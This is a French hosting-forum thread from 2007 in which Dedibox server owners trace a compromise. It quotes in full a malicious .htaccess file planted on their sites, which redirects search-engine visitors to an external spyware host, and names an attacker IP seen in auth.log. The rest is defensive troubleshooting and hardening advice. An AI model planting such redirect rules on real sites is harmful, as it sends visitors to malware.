Le Forum Non Officiel de la DEDIBOX
Vous n'êtes pas identifié.
Bonjour, cela fait 2 fois deja en une semaine que tout les sites de mon serveur dedibox edition VHCS sont tous bloque a cause de .htaccess qui apparaisent a la racine de chacun d'eux
voici leurs contenue :
**** [START] ****
RewriteEngine on
Options +FollowSymLinks
RewriteCond %{HTTP_REFERER} ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
RewriteRule .*$ http://rostoffhost.info/strf/ [L]
**** [END] ****
n'alller pas sur l'adresse rostoffhost, ca vous colle un spyware
en suprimant ces .htaccess tout repart normalement mais j'aimerai bien comprendre.
Avez vous deja eu le soucis ?
Merci
en attendant je rechercher de mon cote et je vous tiendrez au courant
Hors ligne
Felicitations, ça fait donc 1 semaine qu'on te pirate ...
Il faut trouver le script en question et le dégager, sans oublier de sécuriser ton serveur.
Hors ligne
maddanny a écrit:
Felicitations, ça fait donc 1 semaine qu'on te pirate ...
ca fait pas une semaine qu'on me pirate mais 2 fois en une semaine, nuance
je pensais avoir solutionné le probleme la premiere fois (je n'avez pas juste supprimer les fichiers...), desolé d'avoir fait une erreur et d'avoir demander de l'aide
Hors ligne
Euh non l'erreur c'est que tu n'as pas encore trouvé la faille !
Et que ton install n'est pas sécurisée ...
Fais la liste des applis installées et chercher sur leurs forums si d'autres utilisateurs ont eu le probleme, ça te permettra de trouver + rapidement la solution.
Hors ligne
Bonjour,
même problème, dedibox piratée et ajout de htaccess de redirection !!!
L'url rewriting n'était pas activé, donc je m'en suis aperçu à cause de l'erreur 500 ...
Est ce que quelqu'un peu expliquer (clairement) quel sont les logs à analyser pour comprendre ou se trouve la faille ?
Merci d'avance,
A+
Hors ligne
Apparement, c'est peut être une faille dotclear ?
Est ce que tous ceux qui ont été piraté ont une install dotclear ?
J'ai rien trouvé dans les logs du serveur concernant un acces à mon dotclear a l'heure du piratage ...
http://www.dotclear.net/log/post/2006/0 … tClear-12x
Hors ligne
Peut être un probléme avec vhcs alors ?
Je n'est pas trouvé les logs apache d'accès à vhcs, quelqu'un sait ou ils sont ?
Hors ligne
Ouais a mon avis c'est vhcs
je dit ca par ce que tout les site que j'ai creer via VHCS sur ce serveur on ete touché mais pas ceux que j'ai parametré a la main dans apache
pour le moment je ai protege vhcs avec un htaccess je v voir si ca suffi. j'a pas trouve de trace dans les logs ca m'ettone
Hors ligne
J'ai eu droit a la même chose:
Ubuntu 7.04
Pas de dotclear, pas de VHCS
Regardez votre fichier auth.log dans /var/log
Vous verrez "Accepted password for root "... avec l'ip 205.234.141.155, en ssh2 ...
Je ne sais pas par où ils sont passés, mais j'ai un un accès ssh par site où a été rajouté le .htaccess
Ma distrib était et est a jour, je n'ai pas encore trouvé d'infos sur la source du problème
Sur le serveur, il y a, entre autres
Apache 2.2.4 compilé par mes soins, avec relativement peu de modules
Php 5.2.3 compilé par mes soins, avec le module php-suhosin (sécurité accrue)
Quelques Joomla, pas tous en dernière version
Un forum Invision 1.3.1 avec les derniers patchs de sécurité
Un serveur TrackMania Nations
Un serveur TeamSpeak (2.0.21 que j'ai upgradé depuis en dernière version)
Bon, j'ai viré tous les .htaccess véreux, et j'ai mis PermitRootLogin sur no dans /etc/sshd_config pour éviter qu'il ne puisse rerentrer en root via ssh.
Pas très rassurant tout ça ![]()
Alors il se passe quoi ? La base de passwords de dedibox a été hackée ?
Dans les logs je n'ai rien du tout a part les traces dans auth.log.
si je fais un "last root" je ne vois même pas les accès en question !!
Hors ligne
Je sais pas comment ils ont fait, mais ça me rassure pas du tout !!!!
J'avais regardé mon fichier auth, mais le hacker a du effacer ces traces, parce que j'ai un gros vide dans la fin de journée du 23 alors que sinon j'ai de nombreuses tentatives d'acces refusé fin du 23 et le 24 .... :'(
Je vais limiter l'acces à mon ssh avec iptable ...
N'hésitez pas si vous avez d'autre chose à regarder pour voir ce qui c'est passé, ou plus d'info sur le problème....
A+
Hors ligne
Y'a déjà au moins 4 ou 5 posts sur le forum ... je commence vraiment à me demander si c'est pas une faille du coté de dedibox !!!!
Hors ligne
Vous avez quelle version de ProFTPD ?
http://www.addict3d.org/news/55191/ProF … dict3d.org
Hors ligne
Corpo a écrit:
Vous avez quelle version de ProFTPD ?
http://www.addict3d.org/news/55191/ProF … dict3d.org
Visiblement cet exploit necessite déjà un acces local à la machine.
Hors ligne
Heu ouais après lecture c'est une "simple" élévation de privilèges locaux ... bon, mauvaise pioche ... je continue de gratter, sans trop de convictions ![]()
Hors ligne
Ce soir je veux bien jetter un coup d'oeil à 1 ou 2 dedibox infectées, si ça interesse qqun ![]()
Bon faudra me filer le root mais je suis un gentil
![]()
Hors ligne
DaRkYoda a écrit:
Y'a déjà au moins 4 ou 5 posts sur le forum ... je commence vraiment à me demander si c'est pas une faille du coté de dedibox !!!!
looooool
Si t'as des dizaines de braqueurs de voitures qui s'acharnent à ne voler que des peugeot, doit on accuser peugeot pour autant ?
Dedibox loue des serveurs dédiés.
TU as installé un OS dessus.
TU es chargé de le sécurisé.
TU es responsable de toute nuisance liée à du piratage.
TU dois tenir tes softwares à jour.
TU ne peut t'en prendre qu'à toi si tu t'es fais hacké.
(Mes phrases ne sont pas des attaques personnelles, ça concerne tout le monde, moi compris ^^)
Hors ligne
Je suis d'accord, il manque un peu de smiley dans mon post, ct plus une boutade en liaison avec la remarque de Corpo : "Alors il se passe quoi ? La base de passwords de dedibox a été hackée ?"
Mais j'aimerais bien comprendre comment c'est produit le hack histoire de sécuriser la faille .... ![]()
Hors ligne
c'est Flying Jack il a la gueule de bois ![]()
un peu nerveux quoi, il a pas encore completement sécurisé la faille dans son crane..héhéhé
et bon anniversaire (en retard..)
Dernière modification par shamankick (2007-08-27 17:14:38)
Hors ligne
Beaucoup de dedibox sont touchées...
Un topic sur ubuntu-fr.org est ouvert :
http://forum.ubuntu-fr.org/viewtopic.ph … 73&p=1
Une discussion sur les newsgroup de dedibox est ouverte :
proxad.dedibox.discussions / Attaque de serveur (ouverte le 24/08/2007)
Le problème ne vient pas de : prof-ftpd - spip - phpbb
Pour l'instant on ne sait pas d'ou il vient...
Hors ligne
C'est clair que c'est lie a dedibox!
Un acces root du premier coup c'est grave!
Sur le post du forum ubuntu, sur le log, on voit que le bot avait meme le nom et mdp du compte utilisateur (ce qui ne peut pas se deviner) et il a ensuite fait un bete su pour passer root.
Ma question est la suivante, pour l'install des dedibox ubuntu, est-ce que vous avez donne un nom d'utilisateur + mot de passe, ou bien vous avez eu un mot de passe root?
Pour ceux qui font des lecons, regardez bien si ces fichiers .htaccess sont la, car ca ne se voit pas, il redirige seulement les visites provenant des moteurs de recherches.
L'un des seuls recoupements est dedibox, toutes celles qui ont ete installees entre le debut de dedibox et il y a plusieurs mois, quand ils ont surement arrete de stocker les mots de passe.
Regardez bien sur google, personne ne parle d'une faille aussi grave sauf nous! Or si c'etait vrai (qu'une faille existe), on en parlerai au 20h!
J'ai une centos4 que je pensait bien protegee mais elle a ete hackee.
Je rappelle quand meme que centos 4 est une redhat entreprise utilisee par beaucoup de grosses boites.
S'il y a vait une telle faille ca ferait un scandale mondial.
TU ne peut t'en prendre qu'à toi si tu t'es fais hacké.
non, on peut s'en prendre a dedibox aussi.
Dernière modification par sophana (2007-08-29 21:10:16)
Hors ligne
Personnelement j'ai opté pour :
désactivation du login root, je dois d'abord me loguer autrement
fail2ban installé
webmin viré (meme si je travail un systeme protégé pour l'activer / désactiver sur demande)
et pour le moment ca n'est pas revenu (en partant d'une install vhcs2 classique) (je n'ai pas protéger mon répertoire /vhcs2/ )
Hors ligne
sophana a écrit:
C'est clair que c'est lie a dedibox!
Un acces root du premier coup c'est grave!
Et c'est quoi ta preuve ? Ton absolue certitude et confiance dans tes capacitées de sysadmin ?
Désolé mais jusqu'à la preuve du contraire Dedibox n'y est pour rien.
Hors ligne
Ah bon, root/root comme login/password c'est pas sikiour ? ![]()
![]()
![]()
![]()
![]()
Hors ligne